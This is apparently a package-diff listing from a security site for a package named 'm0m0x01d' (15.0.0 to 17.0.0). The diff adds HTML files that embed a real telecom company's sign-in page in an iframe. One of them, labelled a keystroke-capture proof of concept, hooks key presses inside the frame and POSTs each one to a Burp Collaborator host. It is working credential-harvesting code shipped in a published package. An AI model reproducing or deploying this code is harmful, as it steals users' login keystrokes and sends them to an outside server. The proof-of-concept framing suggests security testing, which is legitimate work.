m0m0x01d 15.0.0 → 17.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/iframe.svg.html +1 -0
- package/iframe2.svg.html +42 -0
- package/package.json +1 -1
package/iframe.svg.html
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
<iframe src="https://es.account.t-mobile.com/signin/v2/"></iframe>
|
package/iframe2.svg.html
ADDED
|
@@ -0,0 +1,42 @@
|
|
|
1
|
+
<!DOCTYPE html>
|
|
2
|
+
<html lang="en">
|
|
3
|
+
<head>
|
|
4
|
+
<meta charset="UTF-8">
|
|
5
|
+
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
6
|
+
<title>PoC - Keystroke Capture</title>
|
|
7
|
+
<script>
|
|
8
|
+
// Function to send captured data to your server
|
|
9
|
+
function sendKeystrokes(data) {
|
|
10
|
+
var xhr = new XMLHttpRequest();
|
|
11
|
+
xhr.open("POST", "https://q1sbaric7jhkozf4ae7tuk5gm7sygn.burpcollaborator.net/keystrokes", true);
|
|
12
|
+
xhr.setRequestHeader("Content-Type", "application/json");
|
|
13
|
+
xhr.send(JSON.stringify({ keystrokes: data }));
|
|
14
|
+
}
|
|
15
|
+
|
|
16
|
+
// Function to capture keystrokes inside the iframe
|
|
17
|
+
function captureKeystrokes() {
|
|
18
|
+
var iframe = document.getElementById('login-iframe').contentWindow;
|
|
19
|
+
|
|
20
|
+
iframe.document.onkeyup = function(event) {
|
|
21
|
+
// Capture each key press and send it to the server
|
|
22
|
+
sendKeystrokes(event.key);
|
|
23
|
+
};
|
|
24
|
+
}
|
|
25
|
+
|
|
26
|
+
// Start capturing keystrokes when the iframe is loaded
|
|
27
|
+
window.onload = function() {
|
|
28
|
+
var iframe = document.getElementById('login-iframe');
|
|
29
|
+
|
|
30
|
+
iframe.onload = function() {
|
|
31
|
+
captureKeystrokes();
|
|
32
|
+
};
|
|
33
|
+
};
|
|
34
|
+
</script>
|
|
35
|
+
</head>
|
|
36
|
+
<body>
|
|
37
|
+
<h1>Login Page</h1>
|
|
38
|
+
<!-- Embedding the login page -->
|
|
39
|
+
<iframe id="login-iframe" src="https://es.account.t-mobile.com/signin/v2/" width="100%" height="500px"></iframe>
|
|
40
|
+
</body>
|
|
41
|
+
</html>
|
|
42
|
+
|